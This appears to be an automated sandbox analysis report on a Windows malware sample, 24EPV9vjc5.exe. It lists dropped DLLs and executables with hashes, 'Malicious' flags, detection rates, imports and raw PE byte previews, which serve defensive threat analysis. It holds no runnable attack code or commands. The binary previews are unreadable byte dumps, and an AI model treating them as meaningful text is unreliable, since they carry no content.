
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtCore4.dll

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2598912
Entropy (8bit):	6.6049974235008655
Encrypted:	false
SSDEEP:	49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
MD5:	FECC62A37D37D9759E6B02041728AA23
SHA1:	0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
SHA-256:	94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
SHA-512:	698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&.....Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtGui4.dll

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8581632
Entropy (8bit):	6.736578346160889
Encrypted:	false
SSDEEP:	98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:	831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:	6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:	D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:	BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.\|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtNetwork4.dll

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1053696
Entropy (8bit):	6.539052666912709
Encrypted:	false
SSDEEP:	12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:	8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:	5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:	52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:	8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...\|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtXml4.dll

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356352
Entropy (8bit):	6.447802510709224
Encrypted:	false
SSDEEP:	6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:	E9A9411D6F4C71095C996A406C56129D
SHA1:	80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:	C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:	93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6487736
Entropy (8bit):	7.518089126573906
Encrypted:	false
SSDEEP:	98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
MD5:	11C8962675B6D535C018A63BE0821E4C
SHA1:	A150FA871E10919A1D626FFE37B1A400142F452B
SHA-256:	421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
SHA-512:	3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\StarBurn.dll

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	664064
Entropy (8bit):	6.953961612144461
Encrypted:	false
SSDEEP:	12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
MD5:	A147F46E2E1F315AA219482D645BEED9
SHA1:	073A6AE153A903B31463FA33512AA93DA1E3BB6F
SHA-256:	2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
SHA-512:	690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l\|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\hypochondriac.xlsx

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	data
Category:	dropped
Size (bytes):	60283
Entropy (8bit):	4.569551839311306
Encrypted:	false
SSDEEP:	1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
MD5:	3620E2D48EB60EC875FB9262ABC87D2B
SHA1:	55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
SHA-256:	E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
SHA-512:	CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
Malicious:	false
Preview:	.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\msvcp100.dll

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	421200
Entropy (8bit):	6.59808962341698
Encrypted:	false
SSDEEP:	12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:	03E9314004F504A14A61C3D364B62F66
SHA1:	0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:	A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
SHA-512:	2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\msvcr100.dll

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	770384
Entropy (8bit):	6.908020029901359
Encrypted:	false
SSDEEP:	12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:	67EC459E42D3081DD8FD34356F7CAFC1
SHA1:	1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:	1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:	9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..\|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...\|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\wiggery.bmp

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	data
Category:	dropped
Size (bytes):	4567853
Entropy (8bit):	7.952114001019503
Encrypted:	false
SSDEEP:	98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
MD5:	30152DF1AEA607F1159EFEEAC2B8CED1
SHA1:	E290B0553638EE68EB68C1CCE1062C733906EC9B
SHA-256:	5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
SHA-512:	94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
Malicious:	false
Preview:	.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.995895236161738
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	24EPV9vjc5.exe
File size:	15'692'672 bytes
MD5:	ec4072e1ae2a9316270e6afd66235a97
SHA1:	ec499500172ca2cc76c5b30eca34fceb9bacce0d
SHA256:	c5056ac95a2002bc08cb0ec8dbf064f78dff400642ec1a6fc2a132984a7c1d99
SHA512:	80a87456a9b2ae9344f42a2f09f29b4cbcdbda61418270ef1baf11399c7e0fac0c6a95d51682ba6205db908b84e17d7c4a3ff78ebac3efec75f5298b56cbeb7a
SSDEEP:	393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXjy:sRcqetYMe6dgB4QoxwgD/jy
TLSH:	C1F63372A534403AE7F50173EE29A2347E78E320575189BBE2D4FD0A6DB4489A7F3253
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x42e2a6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	d7e2fd259780271687ffca462b9e69b7

Entrypoint Preview

Instruction
call 00007F51D47D60CFh
jmp 00007F51D47D5A43h
mov eax, dword ptr [esp+08h]
mov ecx, dword ptr [esp+10h]
or ecx, eax
mov ecx, dword ptr [esp+0Ch]
jne 00007F51D47D5BBBh
mov eax, dword ptr [esp+04h]
mul ecx
retn 0010h
push ebx
mul ecx
mov ebx, eax
mov eax, dword ptr [esp+08h]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, dword ptr [esp+08h]
mul ecx
add edx, ebx
pop ebx
retn 0010h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
cmp cl, 00000040h
jnc 00007F51D47D5BC7h
cmp cl, 00000020h
jnc 00007F51D47D5BB8h
shrd eax, edx, cl
shr edx, cl
ret
mov eax, edx
xor edx, edx
and cl, 0000001Fh
shr eax, cl
ret
xor eax, eax
xor edx, edx
ret
push ebp
mov ebp, esp
jmp 00007F51D47D5BBFh
push dword ptr [ebp+08h]
call 00007F51D47DC43Ch
pop ecx
test eax, eax
je 00007F51D47D5BC1h
push dword ptr [ebp+08h]
call 00007F51D47DC4C5h
pop ecx
test eax, eax
je 00007F51D47D5B98h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007F51D47D6454h
jmp 00007F51D47D6431h
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F51D47D646Dh
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
test byte ptr [ebp+08h], 00000001h
push esi
mov esi, ecx
mov dword ptr [esi], 00460DB8h
je 00007F51D47D5BBCh
push 0000000Ch
push esi
call 00007F51D47D5B8Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x686b4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d000	0x3a24	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x3dfc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x67650	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x676a4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x67030	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4b000	0x3e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x68234	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x49937	0x49a00	2319c0baa707bb66cc0bc08c55a13d8c	False	0.5314688561120543	data	6.570006046413636	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4b000	0x1ed60	0x1ee00	8ad6c4e18165c6d8ccdc97bab683438d	False	0.3136386639676113	data	5.114228301263695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6a000	0x1730	0xa00	00fde973df27dc2d36084e16d6dddbdf	False	0.274609375	firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a14600	3.1526594027632213	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn	0x6c000	0x38	0x200	e9ca1c09062508c3b92e35754e60f8d0	False	0.107421875	data	0.5734966016060967	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x6d000	0x3a24	0x3c00	88921ee6f52b1477449352c993b3919c	False	0.3304036458333333	data	5.550645858532838	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x3dfc	0x3e00	dd2c47fa48872886af4c9a2e5bd90ccc	False	0.8097278225806451	data	6.794335469567533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x6d178	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.43185920577617326
RT_MESSAGETABLE	0x6da20	0x2840	data	English	United States	0.28823757763975155
RT_GROUP_ICON	0x70260	0x14	data	English	United States	1.15
RT_VERSION	0x70274	0x2dc	data	English	United States	0.4781420765027322
RT_MANIFEST	0x70550	0x4d2	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminators	English	United States	0.47568881685575365

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
USER32.dll	PeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
OLEAUT32.dll	VariantInit, SysAllocString, VariantClear, SysFreeString
GDI32.dll	DeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
SHELL32.dll	CommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
ole32.dll	CoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
KERNEL32.dll	GetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
RPCRT4.dll	UuidCreate

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
